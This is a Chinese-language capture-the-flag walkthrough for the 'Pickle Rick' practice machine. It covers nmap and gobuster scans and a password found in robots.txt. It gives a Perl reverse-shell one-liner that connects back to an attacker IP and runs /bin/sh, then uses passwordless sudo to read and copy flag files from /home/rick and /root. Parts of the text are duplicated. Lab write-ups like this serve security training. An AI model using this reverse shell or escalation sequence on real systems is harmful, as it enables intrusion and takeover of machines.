
Pickle Rick-练习
本文相关内容:CTF靶机练习
任务目标
实践操作
端口扫描
nmap -T4 -sC -sV -p- 10.10.253.251 



















完整答案

最后更新于

本文相关内容:CTF靶机练习
端口扫描
nmap -T4 -sC -sV -p- 10.10.253.251 




















最后更新于
目录和文件扫描
gobuster dir -u http://10.10.253.251 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,sh,txt,cgi,html,css,js,pyindex.html是首页,和之前访问网站时的默认页面一样,
login.php是登陆页面(这个要关注一下),
assets目录下有一些网站资源文件(看了一下没啥特别的),
portal.php访问时会自动跳转到之前的login.php页面,估计要登陆后才能看到,
robot.txt文件有一串字符为Wubbalubbadubdub,可能是登陆密码。perl -e 'use Socket;$i="10.14.30.69";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'输入ls会显示当前网站根目录下的目录及文件
输入sudo -l列出目前用户可执行与无法执行的指令,发现我们可以通过sudo免密码使用root用户
此时,可以使用sudo ls命令找到/home目录以及/root下的flag文件,
对于/home目录,也可以通过组合命令(cd /home;ls;pwd、cd /home/rick/;ls;pwd)去找flag文件
如果想通过网站url访问flag文件内容,可以使用sudo cp命令复制flag文件到网站根目录,涉及的命令如下:
sudo ls /home
sudo ls /home/rick/
sudo cp /home/rick/second\ ingredients ./second.txt
sudo ls /root
sudo cp /root/3rd.txt .
如果想直接在网页的命令面板界面查看flag内容,可以使用以下命令(当然前提还是要先找到flag文件的位置):
less /home/rick/second\ ingredients
sudo less /root/3rd.txt